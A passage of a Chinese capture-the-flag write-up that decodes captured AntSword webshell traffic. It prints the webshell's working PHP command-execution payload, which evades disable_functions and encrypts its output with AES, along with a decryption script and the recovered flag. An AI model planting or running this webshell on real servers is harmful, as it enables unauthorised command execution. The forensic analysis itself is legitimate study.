65,0x78,0x65,0x63,0x28,0x24,0x63,0x2c,0x24,0x6f,0x2c,0x24,0x72,0x65,0x74,0x29,0x3b,0x70,0x72,0x69,0x6e,0x74,0x28,0x6a,0x6f,0x69,0x6e,0x28,0x22,0xa,0x22,0x2c,0x24,0x6f,0x29,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x70,0x6f,0x70,0x65,0x6e,0x27,0x29,0x29,0x7b,0x24,0x66,0x70,0x3d,0x40,0x70,0x6f,0x70,0x65,0x6e,0x28,0x24,0x63,0x2c,0x27,0x72,0x27,0x29,0x3b,0x77,0x68,0x69,0x6c,0x65,0x28,0x21,0x40,0x66,0x65,0x6f,0x66,0x28,0x24,0x66,0x70,0x29,0x29,0x7b,0x70,0x72,0x69,0x6e,0x74,0x28,0x40,0x66,0x67,0x65,0x74,0x73,0x28,0x24,0x66,0x70,0x2c,0x20,0x32,0x30,0x34,0x38,0x29,0x29,0x3b,0x7d,0x40,0x70,0x63,0x6c,0x6f,0x73,0x65,0x28,0x24,0x66,0x70,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x61,0x6e,0x74,0x73,0x79,0x73,0x74,0x65,0x6d,0x27,0x29,0x29,0x7b,0x40,0x61,0x6e,0x74,0x73,0x79,0x73,0x74,0x65,0x6d,0x28,0x24,0x63,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x7b,0x24,0x72,0x65,0x74,0x20,0x3d,0x20,0x31,0x32,0x37,0x3b,0x7d,0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x24,0x72,0x65,0x74,0x3b,0x7d,0x3b,0x24,0x72,0x65,0x74,0x3d,0x40,0x72,0x75,0x6e,0x63,0x6d,0x64,0x28,0x24,0x72,0x2e,0x22,0x20,0x32,0x3e,0x26,0x31,0x22,0x29,0x3b,0x70,0x72,0x69,0x6e,0x74,0x20,0x28,0x24,0x72,0x65,0x74,0x21,0x3d,0x30,0x29,0x3f,0x22,0x72,0x65,0x74,0x3d,0x7b,0x24,0x72,0x65,0x74,0x7d,0x22,0x3a,0x22,0x22,0x3b,0x3b,0x7d,0x63,0x61,0x74,0x63,0x68,0x28,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x20,0x24,0x65,0x29,0x7b,0x65,0x63,0x68,0x6f,0x20,0x22,0x45,0x52,0x52,0x4f,0x52,0x3a,0x2f,0x2f,0x22,0x2e,0x24,0x65,0x2d,0x3e,0x67,0x65,0x74,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x28,0x29,0x3b,0x7d,0x3b,0x61,0x73,0x6f,0x75,0x74,0x70,0x75,0x74,0x28,0x29,0x3b,0x64,0x69,0x65,0x28,0x29,0x3b]
for i in range(0,len(a)):
    print(chr(a[i]),end="")

处理后的php

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out)
{   @session_start();
    $key='f5045b05abe6ec9b1e37fafa851f5de9';
    return @base64_encode(openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
}
;
;
function asoutput()
{
    $output=ob_get_contents();
    ob_end_clean();
    echo "8c2b4";
    echo @asenc($output);
    echo "e2e10";
}
ob_start();
try{$p=base64_decode($_POST["0x1b4d456c7297d"]);
    $s=base64_decode($_POST["0xb9b45688a5a08"]);
    $d=dirname($_SERVER["SCRIPT_FILENAME"]);
    $c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";
function fe($f)
    {
        $d=explode(",",@ini_get("disable_functions"));
        if(empty($d)){$d=array();}
        else{$d=array_map('trim',array_map('strtolower',$d));}
        return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
    }
        ;
function runcmd($c)
{
    $ret=0;
    if(fe('system'))
    {@system($c,$ret);}
    elseif(fe('passthru'))
    {@passthru($c,$ret);}
    elseif(fe('shell_exec'))
    {print(@shell_exec($c));}
    elseif(fe('exec'))
    {@exec($c,$o,$ret);print(join("",$o));}
    elseif(fe('popen'))
    {
        $fp=@popen($c,'r');
        while(!@feof($fp))
        {print(@fgets($fp, 2048));}
        @pclose($fp);
    }
    elseif(fe('antsystem')){@antsystem($c);}
    else{$ret = 127;}
    return $ret;
};
    $ret=@runcmd($r." 2>&1");
    print ($ret!=0)?"ret={$ret}":"";;
}
catch(Exception $e){echo "ERROR://".$e->getMessage();}
;
asoutput();
die();

看到为aes加密,根据源码和密钥写个解密函数

<?php

$cipher = "8c2b4kRD1eD+vSZ81FAJ6XClabCR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dZOTFg4DW9MYwG6k3rEvAAR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJHygVK0ad8xG1Qk6pzSaCiR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJ1qI47Cz1/qfnNoNARGhLfVhC0RJlfeKCvbPwpjFn//BSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93FIVjxEmVnLHPVr5M/LQPdxSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93GnMvJfVbvphfWnt17IOkzYjvv91k2fnYDR7u4nlGM3YitxGYGs9mn+HS5iJBXORtYrcRmBrPZp/h0uYiQVzkbWK3EZgaz2af4dLmIkFc5G1itxGYGs9mn+HS5iJBXORtUq4dBjDRFhDqDyzs9CScJhrd3yMusQ+qsnZkq4Ey7NVJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l2hDPuDhVN4TaDLzp9bXyfGeCVhvglAaNo2rA/ovnRTTtfA5ZywMOOijj6md5RItqjXwOWcsDDjoo4+pneUSLao18DlnLAw46KOPqZ3lEi2qNfA5ZywMOOijj6md5RItqgS0b9hS7r5TX9YNZo2awgUAyqVacVgwr1NlNQ2k/kihhh0QQfnjeGdZhkz0N0jAKiMzFmAMa7xQ1URxTaHoHjDg3NaWl/8+PVG+pyaKrbNDjfl77POeQE8+0MCHpz6YxWLJ6mwCe1X3uzz/HSHcHSvQBB8FxjOhugOErOXkd3LZi/60Gr4gIEc1JIxA5A2pE/V6Z/DFwNOR4M/IIIWdGr5e2e10";

function decrypt($cipher) {
    $key = 'f5045b05abe6ec9b1e37fafa851f5de9';
    return @base64_decode(openssl_decrypt(base64_decode($cipher), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
};

$cipher = substr($cipher, 5, strlen($cipher) - 10);
echo decrypt($cipher);

在这里插入图片描述
提取流量内容解密

YmFiYWJhYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJi
YmIKaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGho
aGhoaGgKaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGho
aGhoaGhoaGgKZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dn
Z2dnZ2dnZ2dnZ2cKYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJi
YmJiYmJiYmJiYmJiYmIKbm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5u
bm5ubm5ubm5ubm5ubm5ubm4KZmxhZ3tBbnRTd29yZF9pc19Qb3dlcmZ1bF8zMjIyMjIyISEhIX0K
[S]
/var/www/html/tmp
[E]

base64解密
在这里插入图片描述

回复

This is just a placeholder img.